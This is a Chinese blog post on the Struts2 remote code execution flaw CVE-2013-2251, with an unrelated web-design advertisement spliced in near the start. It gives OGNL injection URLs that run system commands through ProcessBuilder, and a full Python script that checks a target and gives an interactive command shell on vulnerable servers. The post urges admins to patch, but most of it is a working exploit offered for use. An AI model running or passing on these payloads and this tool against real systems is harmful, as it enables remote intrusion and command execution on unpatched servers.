7·17中午刚刚午睡醒来就看到几个熟悉字眼——Struts2,远程执行代码。施特!难道继上回
成都创新互联专注于伊川企业网站建设,响应式网站设计,电子商务商城网站建设。伊川网站建设公司,为伊川等地区提供建站服务。全流程专业公司,专业设计,全程项目跟踪,成都创新互联专业和态度为您提供的服务
据报道,受影响版本是2.0.0-2.3.15,CVE编号:CVE-2013-2251。原因是因为参数action的值redirect以及redirectAction没有正确过滤,导致允许***者在访问使用Struts2的应用时远程执行OGNL表达式
漏洞证明:
http://host/struts2-blank/example/X.action?action:%25{3*4}
http://host/struts2-blank/example/X.action?redirect:%25{3*4}
http://host/struts2-blank/example/X.action?redirectAction:%25{3*4}
代码测试:
http://host/struts2-blank/example/X.action?action:%25{(new+java.lang.ProcessBuilder(new+java.lang.String[]{'command','goes','here'})).start()}
http://host/struts2-showcase/employee/save.action?redirect:%25{(new+java.lang.ProcessBuilder(new+java.lang.String[]{'command','goes','here'})).start()}
http://host/struts2-showcase/employee/save.action?redirectAction:%25{(new+java.lang.ProcessBuilder(new+java.lang.String[]{'command','goes','here'})).start()}
官方已经更新补丁,管理员们速度打上,不然裤子被脱了还不知道。
URL:http://struts.apache.org/download.cgi#struts23151
下面show下python写的利用工具【图】
用GOOGLE一搜差点没吓尿,再次强烈建议管理今晚加班都要把这修补了!!!晚安
--------------------------更新py脚本代码-----------------------------------------
#!/usr/bin/env python
# -*- coding: UTF-8 -*-
#
#--------------------------------------
# Struts2 2.0.0 - Struts 2.3.15
# CVE-2013-2251
#---------------------------------------
#Copyright By ,Terryll right Reserved
#author date comment
#Terry 2013-7-17 Created
import urllib
import urllib2
import re
import sys
url_exp = "?redirect:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'whoami'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()}"
def judge(url):
#判断是否存在该漏洞
if url.endswith(".action") :
try:
url = url + url_exp
#print url
url_request = urllib2.Request(url)
response = urllib2.urlopen(url_request)
res_html = response.read()
#print res_html[:100]
if res_html.find(">") > 0:
return "Failed"
else:
return "OK"
#print response.func_code
except :
return "ERROR"
else:
return "url error"
def get_args(argument):
#
#转化为参数的格式如:'ls','-al'
#
args = argument.split(' ')
args_deal = ''
for i in args:
args_deal = args_deal + "'" + i + "',"
args_deal = args_deal[:-1]
return args_deal
def strip(str):
#
#去除首尾的\x00串
#
tmp = str.strip()
blank_line=re.compile('\x00')
tmp=blank_line.sub('',tmp)
return tmp
def attack(url):
#
#DO IT
#
try:
url_request = urllib2.Request(url)
response = urllib2.urlopen(url_request)
res_html = response.read().strip()
return strip(res_html)
except :
return "ERROR"
if __name__ == '__main__':
if len(sys.argv) > 1:
#print get_url("ls -al")
if judge(sys.argv[1]) == "OK":
print "Success"
pattern = re.compile(r'http[s]?://([\w\W]*?)/')
url = sys.argv[1] + url_exp
hostname = pattern.findall(url)
#print hostname[0]
loop = 1
while loop:
string = raw_input(hostname[0] + " >")
if string.startswith("exit"):
break
loop=0
if len(string) > 0:
url_ = url.replace("'whoami'",get_args(string))
#print url_
print attack(url_)
else:
print "Failed"
else:
print("No argument!")
